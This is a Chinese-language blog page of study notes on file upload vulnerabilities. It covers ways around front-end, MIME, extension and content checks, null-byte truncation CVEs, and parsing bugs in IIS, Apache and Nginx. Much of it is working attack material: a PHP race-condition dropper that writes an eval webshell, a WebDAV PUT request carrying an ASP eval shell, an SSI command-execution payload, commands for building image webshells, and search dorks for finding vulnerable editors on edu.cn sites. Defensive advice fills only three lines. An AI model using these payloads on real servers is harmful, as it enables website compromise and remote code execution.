<!DOCTYPE html>
<html>
  <head>
    
    
    
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <title>
      
  文件上传 &ndash; Arefu&#39;s Zone

    </title>
    
    
    <meta name="description" property="og:description" content="文件上传漏洞笔记|Hugo-Primer theme&#39;s example site">
    

    <meta name="apple-mobile-web-app-title" content="Arefu&#39;s Zone">
    
    
    <link rel="icon" href="/favicon-64.png">
    <link rel="apple-touch-icon" href="/apple-touch-icon.png">
    <link rel="mask-icon" size="any" href="/pinned-icon.svg">
    
    
    
    <meta name="twitter:card" content="summary">
    <meta name="twitter:site" content="@">
    <meta name="twitter:creator" content="@">
    <meta name="twitter:title" content="文件上传 | Arefu&#39;s Zone">
    <meta name="twitter:description" content="文件上传漏洞笔记|Hugo-Primer theme&#39;s example site">
    <meta name="twitter:image" content="https://blog.go1f.cc/twitter-card.png">
    


    <link rel="stylesheet" href="/assets/syntax.css">
    <link rel="stylesheet" href="/assets/primer-build.css">
    <link rel="stylesheet" href="/assets/style.css">
  </head>


  <body class="bg-gray">
    <div id="holy" class="container-lg bg-white h-100">

      <div id="header" class="px-1 bg-white">
        <nav class="UnderlineNav UnderlineNav--right px-2">
  <a class="UnderlineNav-actions muted-link h2" href="https://blog.go1f.cc/">
    Arefu&#39;s Zone
  </a>

  
  
  <div class="UnderlineNav-body">
    
    
    
    <a class="UnderlineNav-item " href="/">
      
      <span>公告栏</span>
    </a>
    
    
    
    
    <a class="UnderlineNav-item " href="/notes/">
      
      <span>学习笔记</span>
    </a>
    
    
    
    
    <a class="UnderlineNav-item " href="/blog/">
      
      <span>博客</span>
    </a>
    
    
  </div>
  
</nav>

      </div>

      <div role="main" id="main" class="holy-main markdown-body px-4 bg-white">
        

<div class="Subhead">
  <div class="Subhead-heading">
    <div class="h1 mt-3 mb-1">文件上传</div>
  </div>
  <div class="Subhead-description">
    


<a href='/categories/web%E5%AE%89%E5%85%A8' class="muted-link">
  <span class="Label Label--gray-darker">WEB安全</span>
</a>



<a href='/tags/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0' class="muted-link">
  <span class="Label Label--gray">文件上传</span>
</a>



    
    <div class="float-md-right">
      <span title="Lastmod: 2020-01-20. Published at: 2020-01-20.">
        
          Published: 2020-01-20
        
      </span>
    </div>
    
  </div>
</div>
<article>
  
  <section class="pb-6 mb-3 border-bottom">
    <p>文件上传漏洞笔记</p>
<p><strong>途径</strong></p>
<ul>
<li>
<p>相册、头像</p>
</li>
<li>
<p>视频、照片分享</p>
</li>
<li>
<p>附件上传</p>
</li>
<li>
<p>文件管理器</p>
</li>
</ul>
<h2 id="前端检验">前端检验</h2>
<ul>
<li>
<p>删除或者禁用js</p>
</li>
<li>
<p>burpsuit代理控制POST content</p>
<blockquote>
<p>filename=&quot;shell.php&rdquo;</p>
<p>content-Type: image/jpeg</p>
</blockquote>
</li>
<li>
<p>修改js程序</p>
</li>
</ul>
<h2 id="mime文件类型检验">MIME文件类型检验</h2>
<p>MIME文件定义在web服务器的/conf/mime.types</p>
<p><strong>常见MIME</strong></p>
<blockquote>
<p>text/plain &gt; txt;  text/javascript&gt;js;</p>
<p>image/png &gt; png; image/gif  &gt; gif; image/jpeg &gt;  jpeg jpg;</p>
<p>application/msword &gt; doc; application/pdf &gt; pdf;</p>
<p>video/mp4 &gt; mp4; video/x-msvideo &gt; avi; video/x-flv &gt; flv;</p>
</blockquote>
<p><strong>绕过</strong></p>
<p>修改“Content-Type”字段为合法MIME类型</p>
<h2 id="扩展名检验">扩展名检验</h2>
<h3 id="黑名单检测">黑名单检测</h3>
<p><strong>黑名单列表绕过</strong></p>
<blockquote>
<p><code>AddType application/x-httpd-php   .php .phtml .php5 .php3</code> .shtml</p>
</blockquote>
<blockquote>
<p>jsp jspx jspf</p>
<p>asp asa cer cdx aspx ashx</p>
<p>php php3 php4 php5</p>
<p>exe exee</p>
</blockquote>
<p><strong>大小写绕过</strong></p>
<blockquote>
<p>.PHP .pHp .aSp</p>
</blockquote>
<p><strong>黑名单字符串替换绕过</strong></p>
<p>针对单次替换，双写</p>
<pre><code>str_replace(&quot;php&quot;, &quot; &quot;, &quot;shell.pphphp&quot;)
</code></pre><h3 id="userini绕过">.user.ini绕过</h3>
<p><a href="https://wooyun.js.org/drops/user.ini%E6%96%87%E4%BB%B6%E6%9E%84%E6%88%90%E7%9A%84PHP%E5%90%8E%E9%97%A8.html"><strong>文件构成的PHP后门</strong></a></p>
<p>让同目录下正常的php文件都“自动”包含某个文件</p>
<pre><code>auto_prepend_file=01.gif
</code></pre><p>借助图片马，造成文件包含。</p>
<h3 id="htaccess-间接绕过">.htaccess 间接绕过</h3>
<p>利用.htaccess（apache的分布式配置文件） 添加文件后缀做php解析</p>
<p><strong>条件</strong></p>
<ul>
<li>Apache+mod_php5 模式</li>
<li>apache 启用 AllowOverride</li>
<li>黑名单过滤.htaccess文件</li>
<li>多个上传文件在一个文件夹或子文件夹共存</li>
</ul>
<p><strong>原理</strong></p>
<blockquote>
<p><a href="https://www.cnblogs.com/adforce/archive/2012/11/23/2784664.html">.htaccess 详解</a></p>
</blockquote>
<p>当前目录的.htaccess文件会覆盖全局httpd.conf的配置</p>
<p>自行构建一个&rdquo;.htaccess&quot;文件做上传：</p>
<pre><code>AddType application/x-httpd-php  .abc
</code></pre><p>或</p>
<pre><code>&lt;FilesMatch &quot;abc&quot;&gt;
    SetHandler application/x-httpd-php
&lt;/FilesMatch&gt;
</code></pre><h3 id="windows系统特性">Windows系统特性</h3>
<ul>
<li>
<p>文件后缀添加空格</p>
</li>
<li>
<p>文件后缀添加 <code>.</code></p>
<pre><code>shell.php.
shell.php. .
</code></pre><p>Windows下自动将非法字符去掉</p>
</li>
<li>
<p>添加 ::$DATA后缀</p>
<p>NTFS ADS流格式 <code>filename.ext::$DATA</code></p>
<p>$DATA代表了主数据流的数据，用于绕过黑名单后缀检测</p>
<p>引用：<a href="https://veritas501.space/2017/03/04/%E8%84%91%E6%B4%9E%E5%A4%A7%E5%BC%80%20-%20NTFS%E4%BA%A4%E6%8D%A2%E6%95%B0%E6%8D%AE%E6%B5%81ADS/">脑洞大开 - NTFS交换数据流ADS</a></p>
</li>
</ul>
<h3 id="0x00截断">0x00截断</h3>
<h4 id="cve-2006-7243httpswwwlinuxidccomlinux2012-0458534htm"><a href="https://www.linuxidc.com/Linux/2012-04/58534.htm">CVE-2006-7243</a></h4>
<p>PHP 5.3.4之前版本<strong>路径名</strong>中接受\0字符，通过在此<strong>字符后放置安全的文件扩展名</strong>，攻击者可绕过目标访问限制。</p>
<pre><code>文件命名：
shell.php%00.jpg
若文件存放路径可控，修改路径
upload/test.php%00/avatar.png
</code></pre><p><strong>条件</strong></p>
<p>php&lt;5.3.4  &amp;&amp; magic_qutoes_gpc off</p>
<h4 id="cve-2015-2348httpswwwfreebufcomvuls62811html"><a href="https://www.freebuf.com/vuls/62811.html">CVE-2015-2348</a></h4>
<p><strong>触发函数</strong></p>
<p>比如move_uploaded_file(),getimagesize(), imagecreatefromjpeg()…等</p>
<pre><code>move_uploaded_file($_FILES['name']['tmp_name'],&quot;/file.php\x00.jpg&quot;);
</code></pre><p><strong>条件</strong></p>
<p>php版本在 5.4.39, 5.5.x – 5.5.23, 或者 5.6.x – 5.6.7，且上传的文件名保留</p>
<pre><code>$target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );

move_uploaded_file($_FILES['uploaded']['tmp_name'], $target_path);
</code></pre><p>**PS：**截断字符的 get提交   <code>%00</code>，post提交需要对<code>%00</code> url解码；</p>
<p>代码审计：重点关注不经过赋值和过滤、直接拼接的 <code>$_GET</code>、<code>$_POST</code>等外部引入的可控变量</p>
<h2 id="读写条件竞争">读写条件竞争</h2>
<p>使用burpsuit爆破模块，上传恶意代码文件的同时请求访问该资源（在本地生成一句话木马）</p>
<p>恶意代码如下：</p>
<pre><code>&lt;?php
 fputs(fopen('1.php','w'),'&lt;? eval($_POST[a]);?&gt;');
?&gt;
</code></pre><p>代码审计时留意 <strong>移动</strong>、<strong>改名</strong>、<strong>上传</strong>等文件操作的逻辑顺序</p>
<h2 id="文件内容检验">文件内容检验</h2>
<h3 id="文件幻数检测">文件幻数检测</h3>
<p>jpg文件幻数 JPGGraphic File，16进制：FFD8FFE000104A464946</p>
<p>gif文件幻数  GIF89a 或 GIF87a，16进制： 474946383961</p>
<p>png文件幻数 Zip Compressed，16进制： 89504E47</p>
<h3 id="文件相关信息检测">文件相关信息检测</h3>
<p><strong>制作图片马</strong></p>
<div class="highlight"><pre class="chroma"><code class="language-sh" data-lang="sh"><span class="c1">#windows /b 二进制； /a ASCII</span>
copy logo.png /b + shell.php /a  picshell.png
<span class="c1">#linux</span>
cp logo.jpg /b + shell.php /a hack.jpg
</code></pre></div><h3 id="文件加载检测">文件加载检测</h3>
<p><strong>绕过二次渲染函数</strong></p>
<p>imagecreatefromjpeg 二次渲染jpeg图片</p>
<ul>
<li>
<p>检验工具：winhex 文件对比软件</p>
</li>
<li>
<p>手动方法：往二次渲染前后不变的地方插入代码，一般在一段连续<code>00 00 00 00 00</code>里进行插入一句话。</p>
</li>
<li>
<p>使用脚本：</p>
<p>jpg_payload.php、png_payload.php脚本</p>
<p>对二次渲染后的图片，执行命令</p>
<pre><code>php jpg_payload.php shell.jpg
</code></pre></li>
</ul>
<p>​</p>
<h2 id="解析漏洞">解析漏洞</h2>
<p>中间件（解析非php后缀文件）</p>
<p>》》》php解析运行（版本&lt;5.3.9忽略后缀直接解析，往后版本有security.security.limit_extensions限制）</p>
<h3 id="iis">IIS</h3>
<p><strong>IIS 5.x - 6.x</strong></p>
<ul>
<li>
<p><strong>xx.asp目录解析</strong></p>
<p>服务器默认将xx.asp目录下的文件都解析为asp文件</p>
</li>
<li>
<p><strong>文件解析</strong></p>
<p>服务器默认不解析；号后面的内容，于是xx.asp;.jpg文件解析作asp文件</p>
</li>
</ul>
<p><strong>IIS 7.0/7.5</strong></p>
<p><strong>条件</strong>：运行在cgi模式，cgi.fix_pathinfo=1</p>
<p>对任意文件名只要在URL后面追加上字符串&rdquo;/任意文件名.php&quot;就会按照php的方式去解析；</p>
<pre><code>任意文件名/任意文件名.php
</code></pre><h3 id="apache">Apache</h3>
<ul>
<li>
<p><strong>Apache 1.x 2.x 解析漏洞</strong></p>
<p>一个文件名为x1.x2.x3的文件，Apache会从右往左解析，直到遇到一个能解析的扩展名为止。例如test.php.a.b最后解析为test.php</p>
<p><strong>思路</strong></p>
<p>若允许上传7z文件，可以上传shell.php.7z，apache会识别为shell.php</p>
</li>
<li>
<p><a href="https://github.com/vulhub/vulhub/tree/master/httpd/apache_parsing_vulnerability"><strong>Apache Httpd 多后缀解析漏洞</strong></a></p>
<p><strong>条件</strong></p>
<ul>
<li>
<p><strong>php&lt;5.3.9</strong></p>
</li>
<li>
<p>httpd.conf添加配置：</p>
<pre><code>AddHandler application/x-httpd-php .php
或
AddHandler php5-script .php
</code></pre></li>
</ul>
<p>那么，在有多个后缀的情况下，只要一个文件含有<code>.php</code>后缀的文件即将被识别成PHP文件，没必要是最后一个后缀。利用这个特性，将会造成一个可以绕过上传白名单的解析漏洞。</p>
</li>
<li>
<p><strong>Apache添加解析后缀</strong></p>
<p>AddType 配置（一般结合.htaccess攻击）</p>
<pre><code>AddType application/x-httpd-php .jpg
</code></pre><p>则文件名是test.php.jpg也会解析为php。</p>
</li>
<li>
<p><strong><a href="https://www.leavesongs.com/PENETRATION/apache-cve-2017-15715-vulnerability.html">Apache HTTPD 换行解析漏洞（CVE-2017-15715）</a></strong></p>
<p>2.4.0~2.4.29版本中存在一个解析漏洞，在解析PHP时，<code>1.php\x0A</code>将被按照PHP后缀进行解析，导致绕过一些服务器的安全策略。</p>
<ol>
<li>获取文件名时不能用<code>$_FILES['file']['name']</code>，因为会自动把换行去掉？！（鸡肋）</li>
<li>默认的Apache配置即可利用，因为默认Apache配置就使用了<code>$</code>。（这是为了修补旧的解析漏洞）</li>
</ol>
<pre><code>&lt;FilesMatch \.php$&gt;
    SetHandler application/x-httpd-php
&lt;/FilesMatch&gt;
</code></pre></li>
<li>
<p><strong>Apache SSI 远程命令执行漏洞</strong></p>
<p>在测试任意文件上传漏洞的时候，目标服务端可能不允许上传php后缀的文件。如果目标服务器开启了SSI与CGI支持，我们可以上传一个shtml文件，并利用<code>&lt;!--#exec cmd=&quot;id&quot; --&gt;</code>语法执行任意命令。</p>
</li>
</ul>
<h3 id="nginx">Nginx</h3>
<p><strong>条件</strong></p>
<ul>
<li>
<p><strong>php&lt;5.3.9</strong> ，因为新版php添加<strong>security.limit_extensions</strong>，限制了可执行文件的后缀。</p>
</li>
<li>
<p>php以cgi模式运行</p>
</li>
</ul>
<p><strong>原理 <a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4547">CVE-2013-4547</a></strong></p>
<p>Nginx获取到文件路径upload/test.jpg/bb.txt/shell.php，因php后缀结尾而送往php解析；</p>
<p>由于php开启了路径修补（ cgi.fix_pathinfo=1)，逐层查找upload/test.jpg/bb.txt、upload/test.jpg，最后找到upload/test.jpg，以php解析该文件</p>
<pre><code>www.xxxx.com/Upload/image/1.jpg/1.php
www.xxxx.com/Upload/image/1.jpg%00.php
www.xxxx.com/Upload/image/1.jpg/%20\0.php
</code></pre><h2 id="配置不当">配置不当</h2>
<h3 id="iis-webdav漏洞详情">IIS Webdav漏洞详情</h3>
<p>当测试一个站点是否存在webdav漏洞时，可以先构造一个OPTIONS请求，若返回200，则查看返回头的Allow参数中包含哪些方法（可以请求）。</p>
<pre><code>OPTIONS  / HTTP/1.1
Host:thief.one
</code></pre><p>如果存在PUT方法，则可以尝试写入一个txt文件。</p>
<pre><code>PUT /shell.txt HTTP/1.1
HOST:thief.one
Content-length:30

&lt;%eval request(&quot;nmask&quot;)%&gt;
</code></pre><p>　　若返回200则说明上传成功，此时可以手动访问此文件，确认是否存在。当然也有可能返回403，这表示此目录没有上传的权限，可以尝试上传到其他目录。
通过MOVE或COPY方法改文件后缀名。</p>
<pre><code>COPY /shell.txt HTTP/1.1
HOST:thief.one
Destination:http://thief.one/shell.asp
</code></pre><h2 id="防御">防御</h2>
<p>上传目录禁止运行</p>
<p>使用白名单过滤</p>
<p>更新php版本</p>
<h2 id="在线编辑器任意文件上传">在线编辑器任意文件上传</h2>
<p>UEditor</p>
<p>eWebEditor</p>
<p>CKEditor</p>
<p><strong>FCK2.6.6版本上传漏洞绕过测试</strong></p>
<p>在浏览器地址栏中的测试网址后面输入：<code>/_whatsnew.html</code> 查看版本信息。</p>
<pre><code>editor/filemanager/browser/default/connectors/test.html
</code></pre><p><strong>FCK2.4.2版本上传漏洞绕过测试</strong></p>
<p>打开FCK上传点在浏览器地址栏中的测试网址后面输入：</p>
<pre><code>editor/filemanager/browser/default/connectors/test.html
</code></pre><p><strong>GoogleHacking</strong></p>
<p>inurl:&ldquo;editor/filemanager&rdquo;</p>
<p>intext:&ldquo;Index of&rdquo; site:&ldquo;edu.cn&rdquo;</p>
<p>参考文章：</p>
<p><a href="http://www.owasp.org.cn/OWASP_Training/Upload_Attack_Framework.pdf">OWASP上传攻击框架</a></p>
<p><a href="https://github.com/vulhub/vulhub/tree/master/httpd">vulhub/httpd/</a></p>
  </section>

  <section>
    
      
    
  </section>
</article>

      </div>

      <div id="side" class="pr-1 bg-white">
        <aside class="pr-3">
          
  
    <div id="toc" class="Box Box--blue mb-3">
      <b>文件上传</b><nav id="TableOfContents">
  <ul>
    <li><a href="#前端检验">前端检验</a></li>
    <li><a href="#mime文件类型检验">MIME文件类型检验</a></li>
    <li><a href="#扩展名检验">扩展名检验</a>
      <ul>
        <li><a href="#黑名单检测">黑名单检测</a></li>
        <li><a href="#userini绕过">.user.ini绕过</a></li>
        <li><a href="#htaccess-间接绕过">.htaccess 间接绕过</a></li>
        <li><a href="#windows系统特性">Windows系统特性</a></li>
        <li><a href="#0x00截断">0x00截断</a></li>
      </ul>
    </li>
    <li><a href="#读写条件竞争">读写条件竞争</a></li>
    <li><a href="#文件内容检验">文件内容检验</a>
      <ul>
        <li><a href="#文件幻数检测">文件幻数检测</a></li>
        <li><a href="#文件相关信息检测">文件相关信息检测</a></li>
        <li><a href="#文件加载检测">文件加载检测</a></li>
      </ul>
    </li>
    <li><a href="#解析漏洞">解析漏洞</a>
      <ul>
        <li><a href="#iis">IIS</a></li>
        <li><a href="#apache">Apache</a></li>
        <li><a href="#nginx">Nginx</a></li>
      </ul>
    </li>
    <li><a href="#配置不当">配置不当</a>
      <ul>
        <li><a href="#iis-webdav漏洞详情">IIS Webdav漏洞详情</a></li>
      </ul>
    </li>
    <li><a href="#防御">防御</a></li>
    <li><a href="#在线编辑器任意文件上传">在线编辑器任意文件上传</a></li>
  </ul>
</nav></div>
  

  
    
    
      <div>
        

        

        

        
          <a data-pocket-label="pocket" data-pocket-count="none" class="pocket-btn" data-lang="en"></a>
          <script type="text/javascript">!function(d,i){if(!d.getElementById(i)){var j=d.createElement("script");j.id=i;j.src="https://widgets.getpocket.com/v1/j/btn.js?v=1";var w=d.getElementById(i);d.body.appendChild(j);}}(document,"pocket-btn-js");</script>
        

      </div>
    
  

        </aside>
      </div>

      <div id="footer" class="pt-2 pb-3 bg-white text-center">
        

  <span class="text-small text-gray">
    ©go1f 2020 &middot; 

    Powered by the
    <a href="https://github.com/qqhann/hugo-primer" class="link-gray-dark">Hugo-Primer</a> theme for
    <a href="https://gohugo.io" class="link-gray-dark">Hugo</a>.
  </span>


      </div>
    </div>

    
  </body>
</html>
